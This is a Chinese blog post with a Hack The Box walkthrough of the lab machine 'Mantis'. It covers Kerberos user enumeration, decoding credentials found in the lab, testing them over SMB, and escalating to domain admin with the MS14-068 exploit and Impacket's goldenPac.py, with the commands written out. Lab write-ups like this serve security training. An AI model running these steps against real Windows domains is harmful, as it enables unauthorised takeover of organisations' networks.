<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"evilarsene.icu","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>


  <meta name="description" content="对方机器为域环境">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB:Mantis">
<meta property="og:url" content="http://evilarsene.icu/2021/05/10/HTB-Mantis/index.html">
<meta property="og:site_name" content="Love ❤ Hacking">
<meta property="og:description" content="对方机器为域环境">
<meta property="og:locale">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/1.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/2.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/3.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/4.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/8.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/7.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/9.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/10.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/11.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/12.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/13.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/14.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/15.png">
<meta property="og:image" content="http://evilarsene.icu/images/Mantis/16.png">
<meta property="article:published_time" content="2021-05-10T14:51:45.000Z">
<meta property="article:modified_time" content="2021-05-10T14:54:44.214Z">
<meta property="article:author" content="EvilArsene">
<meta property="article:tag" content="Windows靶机">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://evilarsene.icu/images/Mantis/1.png">

<link rel="canonical" href="http://evilarsene.icu/2021/05/10/HTB-Mantis/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>HTB:Mantis | Love ❤ Hacking</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>
    <a target="_blank" rel="noopener" href="https://github.com/TZESS" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Love ❤ Hacking</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">trickster</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://evilarsene.icu/2021/05/10/HTB-Mantis/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="EvilArsene">
      <meta itemprop="description" content="人格面具操控者 <img src="http://www.hackthebox.eu/badge/image/278745" alt="Hack The Box">">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Love ❤ Hacking">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HTB:Mantis
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-05-10 22:51:45 / 修改时间：22:54:44" itemprop="dateCreated datePublished" datetime="2021-05-10T22:51:45+08:00">2021-05-10</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/HackTheBox/" itemprop="url" rel="index"><span itemprop="name">HackTheBox</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><p><img src="/images/Mantis/1.png" alt="1"></p>
<p>对方机器为域环境</p>
<p>SMB和RPC枚举没有发现，对88 Kerberos端口进行枚举，得到用户名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum --domain htb.local dict --dc 10.10.10.52</span><br></pre></td></tr></table></figure>

<p><img src="/images/Mantis/2.png" alt="2"></p>
<p>8080端口运行着web应用<code>Orchard</code></p>
<p><img src="/images/Mantis/3.png" alt="3"></p>
<p>不过没有有效的漏洞利用</p>
<p><img src="/images/Mantis/4.png" alt="4"></p>
<p>枚举</p>
<h1 id="渗透"><a href="#渗透" class="headerlink" title="渗透"></a>渗透</h1><p>发现了凭据，是二进制数据，python3将其转换为ASCII</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; n &#x3D; int(&#39;010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001&#39;, 2)</span><br><span class="line">&gt;&gt;&gt; n.to_bytes((n.bit_length() + 7) &#x2F;&#x2F; 8, &#39;big&#39;).decode()</span><br><span class="line">@dm!n_P@ssW0rd!</span><br></pre></td></tr></table></figure>

<p>该凭据可以登入Web后台，但是没有地方RCE</p>
<p><img src="/images/Mantis/8.png" alt="8"></p>
<p>另一处文件名是base64编码，解码后16也可以转换为ASCII</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali # echo -n NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx|base64 -d |xxd -ps -r</span><br><span class="line">m$$ql_S@_P@ssW0rd!</span><br></pre></td></tr></table></figure>

<p>DBeaver连接</p>
<p><img src="/images/Mantis/7.png" alt="7"></p>
<p>得到<code>james/J@m3s_P@ssW0rd!</code></p>
<p>尝试使用crackmapexec，没有显示pwned，应该不能直接得到shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crackmapexec smb 10.10.10.52 -u james -p &#39;J@m3s_P@ssW0rd!&#39;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Mantis/9.png" alt="9"></p>
<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><h2 id="方法1"><a href="#方法1" class="headerlink" title="方法1"></a>方法1</h2><p>该机器收到漏洞MS14-068的影响，我们可以在普通用户的权限下获得黄金票据，也就是获得了域管理员权限，利用方式参考<a target="_blank" rel="noopener" href="https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html">链接</a></p>
<p>首先机器安装kerberos环境</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install krb5-user cifs-utils rdate</span><br></pre></td></tr></table></figure>

<p>修改/etc/hosts</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.10.10.52 mantis.htb.local mantis</span><br></pre></td></tr></table></figure>

<p>添加DNS地址到/etc/resolv.conf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nameserver 10.10.10.52</span><br></pre></td></tr></table></figure>

<p>编辑/etc/krb5.conf配置如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">[libdefaults]</span><br><span class="line">    default_realm &#x3D; HTB.LOCAL</span><br><span class="line">  </span><br><span class="line">[realms]</span><br><span class="line">    LAB.LOCAL &#x3D; &#123;</span><br><span class="line">        kdc &#x3D; mantis.htb.local:88</span><br><span class="line">        admin_server &#x3D; mantis.htb.local</span><br><span class="line">        default_domain &#x3D; HTB.LOCAL</span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line">[domain_realm]</span><br><span class="line">    .domain.internal &#x3D; HTB.LOCAL</span><br><span class="line">    domain.internal &#x3D; HTB.LOCAL</span><br></pre></td></tr></table></figure>

<p>确认时间同步，误差为+/- 5分钟</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rdate -n 10.10.10.52</span><br></pre></td></tr></table></figure>

<p>在进行漏洞利用前，首先要确认kerberos的运行状态，所以先生成现有的票据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kinit james</span><br></pre></td></tr></table></figure>

<p>之后通过klist进行查看，如下显示，应该就是正常和域控交互了</p>
<p><img src="/images/Mantis/10.png" alt="10"></p>
<p>之后尝试通过票据和C盘进行smb连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient -W htb.local &#x2F;&#x2F;mantis&#x2F;c$ -k</span><br></pre></td></tr></table></figure>

<p>这里预期性的失败了，因为票据不是管理员权限</p>
<p>之后再尝试和SYSVOL进行连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient -W htb.local &#x2F;&#x2F;mantis&#x2F;sysvol -k</span><br></pre></td></tr></table></figure>

<p>这里会预期性的成功</p>
<p><img src="/images/Mantis/11.png" alt="11"></p>
<p>在伪造黄金票据之前，我们需要当前用户的SID，可以通过RPC枚举得到</p>
<p><img src="/images/Mantis/12.png" alt="12"></p>
<p>得到<code>S-1-5-21-4220043660-4019079961-2895681657-1103</code></p>
<p>现在可以伪造黄金票据了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local</span><br></pre></td></tr></table></figure>

<p><img src="/images/Mantis/13.png" alt="13"></p>
<p>这会生成一个票据文件，我们需要用它覆盖原有的票据文件。之后尝试连接C盘</p>
<p><img src="/images/Mantis/14.png" alt="14"></p>
<p>连接成功，这证明我们已经具有了域管理员权限，到这里，我们已经可以读取C盘上的任意文件了</p>
<p>最后获取shell，可以通过Impacket的goldenPac.py，它的原理和psexec相同，只是使用了我们生成的域管理员票据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">goldenPac.py htb.local&#x2F;james@mantis.htb.local</span><br></pre></td></tr></table></figure>

<p>最后还会碰到一个问题，找到了遇到一篇issue<a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket/issues/385">链接</a>，升级版本可解决</p>
<p><img src="/images/Mantis/15.png" alt="15"></p>
<p>最后获得shell</p>
<p><img src="/images/Mantis/16.png" alt="16"></p>
<h2 id="方法2"><a href="#方法2" class="headerlink" title="方法2"></a>方法2</h2><p>用户james不是administrator权限，对smb的共享都不可写，但由于某些原因，可能是测试，似乎一些人使用psexec对该机器发起了攻击，并且没有完成自动清理部分，导致残留了该工具创建的服务。因此james用户也能触发它们并获得shell，神奇。。</p>
<p><a target="_blank" rel="noopener" href="https://forum.hackthebox.eu/discussion/529/mantis-write-up-by-alamot">https://forum.hackthebox.eu/discussion/529/mantis-write-up-by-alamot</a><br><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket/issues/346">https://github.com/SecureAuthCorp/impacket/issues/346</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Windows%E9%9D%B6%E6%9C%BA/" rel="tag"># Windows靶机</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/05/07/HTB-tenten/" rel="prev" title="HTB:tenten">
      <i class="fa fa-chevron-left"></i> HTB:tenten
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/05/10/HTB-Writeup/" rel="next" title="HTB:Writeup">
      HTB:Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B8%97%E9%80%8F"><span class="nav-number">2.</span> <span class="nav-text">渗透</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">3.</span> <span class="nav-text">提权</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E6%B3%951"><span class="nav-number">3.1.</span> <span class="nav-text">方法1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E6%B3%952"><span class="nav-number">3.2.</span> <span class="nav-text">方法2</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="EvilArsene"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">EvilArsene</p>
  <div class="site-description" itemprop="description">人格面具操控者 <img src="http://www.hackthebox.eu/badge/image/278745" alt="Hack The Box"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">161</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://weibo.com/TZESS" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;TZESS" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/Arsene_IP" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;Arsene_IP" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">EvilArsene</span>
</div>

<span id="sitetime"></span>
<script language=javascript>
	function siteTime(){
		window.setTimeout("siteTime()", 1000);
		var seconds = 1000;
		var minutes = seconds * 60;
		var hours = minutes * 60;
		var days = hours * 24;
		var years = days * 365;
		var today = new Date();
		var todayYear = today.getFullYear();
		var todayMonth = today.getMonth()+1;
		var todayDate = today.getDate();
		var todayHour = today.getHours();
		var todayMinute = today.getMinutes();
		var todaySecond = today.getSeconds();
		/* Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
		year - 作为date对象的年份，为4位年份值
		month - 0-11之间的整数，做为date对象的月份
		day - 1-31之间的整数，做为date对象的天数
		hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
		minutes - 0-59之间的整数，做为date对象的分钟数
		seconds - 0-59之间的整数，做为date对象的秒数
		microseconds - 0-999之间的整数，做为date对象的毫秒数 */
		var t1 = Date.UTC(2018,02,13,15,00,00); //北京时间2018-2-13 00:00:00
		var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
		var diff = t2-t1;
		var diffYears = Math.floor(diff/years);
		var diffDays = Math.floor((diff/days)-diffYears*365);
		var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
		var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
		var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
		document.getElementById("sitetime").innerHTML=" 已安全运行"+(diffYears-2)+" 年 "+diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
	}/*因为建站时间还没有一年，就将之注释掉了。需要的可以取消*/
	siteTime();
</script>

<script>
console.log(`%c
. . . . . . . . . . . . . . . . . . . . . . . . . . .
.                                                   .
.                      uuuuuuu                      .
.                  uu$$$$$$$$$$$uu                  .
.               uu$$$$$$$$$$$$$$$$$uu               .
.              u$$$$$$$$$$$$$$$$$$$$$u              .
.             u$$$$$$$$$$$$$$$$$$$$$$$u             .
.            u$$$$$$$$$$$$$$$$$$$$$$$$$u            .
.            u$$$$$$$$$$$$$$$$$$$$$$$$$u            .
.            u$$$$$$"   "$$$"   "$$$$$$u            .
.            "$$$$"      u$u       $$$$"            .
.             $$$u       u$u       u$$$             .
.             $$$u      u$$$u      u$$$             .
.              "$$$$uu$$$   $$$uu$$$$"              .
.               "$$$$$$$"   "$$$$$$$"               .
.                 u$$$$$$$u$$$$$$$u                 .
.                  u$"$"$"$"$"$"$u                  .
.       uuu        $$u$ $ $ $ $u$$       uuu        .
.      u$$$$        $$$$$u$u$u$$$       u$$$$       .
.       $$$$$uu      "$$$$$$$$$"     uu$$$$$$       .
.     u$$$$$$$$$$$uu    """""    uuuu$$$$$$$$$$     .
.     $$$$"""$$$$$$$$$$uuu   uu$$$$$$$$$"""$$$"     .
.      """      ""$$$$$$$$$$$uu ""$"""              .
.                uuuu ""$$$$$$$$$$uuu               .
.       u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$      .
.       $$$$$$$$$$""""           ""$$$$$$$$$$$"     .
.        "$$$$$"                      ""$$$$""      .
.          $$$"                         $$$$"       .
.                                                   .
.               Welcome to Console ;)               .
. . . . . . . . . . . . . . . . . . . . . . . . . . .`,"color:#9acc14; background:black; font-family: monospace");
</script>
        








      </div>
    </footer>
  </div>

  
  <script color='' opacity='' zIndex='' count='' src="/lib/canvas-nest/canvas-nest-nomobile.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>

<script type="text/javascript" src="\js\FunnyTitle.js"></script>